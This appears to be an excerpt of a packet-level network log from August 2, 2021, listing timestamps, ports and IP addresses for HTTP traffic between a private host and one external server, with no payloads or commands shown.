                                Aug 2, 2021 10:59:58.046662092 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046670914 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046684980 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046695948 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046696901 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046710968 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046715021 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046722889 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046740055 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046742916 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046757936 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046768904 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046770096 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046783924 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046797037 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046806097 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046808958 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046823025 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046825886 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046835899 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046849012 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046859980 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046860933 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046874046 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046880007 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046886921 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046900034 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046911955 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046914101 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046925068 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046930075 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046938896 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046963930 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046963930 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046977043 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046998024 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046998978 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047017097 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047017097 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047030926 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047049046 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047063112 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047065973 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047080040 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047096968 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047096968 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047111034 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047138929 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047146082 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047164917 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047172070 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047178030 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047190905 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047207117 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047208071 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047219992 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047236919 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047243118 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047250032 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047260046 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047262907 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047276974 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047288895 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.047288895 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047307968 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.047339916 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.052361012 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070621014 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070657015 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070672989 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070697069 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070713043 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070729017 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070744991 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070766926 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070782900 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070785999 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070799112 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070818901 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070822001 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070822001 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070849895 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070873022 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070890903 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070894957 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070913076 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070934057 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070950031 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070961952 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070966005 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070971966 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.070982933 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.070993900 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071016073 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071033001 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071036100 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071063995 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071077108 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071089029 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071110010 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071130991 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071157932 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071172953 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071182013 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071202040 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071225882 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071228027 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071252108 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071274996 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071276903 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071295977 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071316957 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071324110 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071337938 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071357965 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071362019 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071379900 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071404934 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071407080 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071428061 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071449041 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071456909 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071470976 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071486950 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071504116 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071516037 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071533918 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071540117 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071562052 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071583033 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071589947 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071604013 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071624994 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071625948 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071645975 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071666956 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071669102 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071692944 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071712017 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071716070 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071737051 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071758032 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071762085 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071779966 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071800947 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071808100 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071821928 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071842909 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071846008 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071867943 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071891069 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071893930 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071912050 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071933031 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071933985 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071954012 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071974039 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.071976900 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.071995020 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.072014093 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.072016001 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.072062016 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073677063 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073703051 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073718071 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073734999 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073755026 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073776960 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073777914 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073793888 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073812008 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073831081 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073833942 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073844910 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073859930 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073877096 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073885918 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073894978 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073909044 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073923111 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073926926 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073929071 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073940039 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073977947 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.073977947 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.073997974 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074013948 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074029922 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074038982 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074048042 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074064970 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074075937 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074085951 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074090004 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074105978 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074121952 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074140072 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074142933 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074153900 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074174881 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074182987 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074194908 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074212074 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074223042 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074232101 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074249983 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074259043 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074268103 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074289083 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074295998 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074301004 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074320078 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074323893 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074336052 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074348927 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074362040 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074364901 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074379921 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074379921 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074398994 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074414015 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074418068 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074434996 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074448109 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074454069 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074470997 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074487925 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074489117 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.074505091 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.074532032 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.076338053 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.076426983 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.078671932 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078700066 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078716993 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078732014 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078752995 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078761101 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.078772068 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078783035 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.078789949 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078808069 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078809023 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.078825951 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078839064 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078850985 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078862906 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.078886032 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.078887939 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078915119 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078927994 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078947067 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078954935 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.078967094 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078986883 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.078991890 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.079009056 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079025984 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079035044 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.079045057 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079061985 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.079062939 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079081059 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079097033 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.079097033 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079129934 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.079142094 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079161882 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079179049 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079195976 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079199076 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.079214096 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079231977 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.079233885 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079250097 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.079271078 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.080177069 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
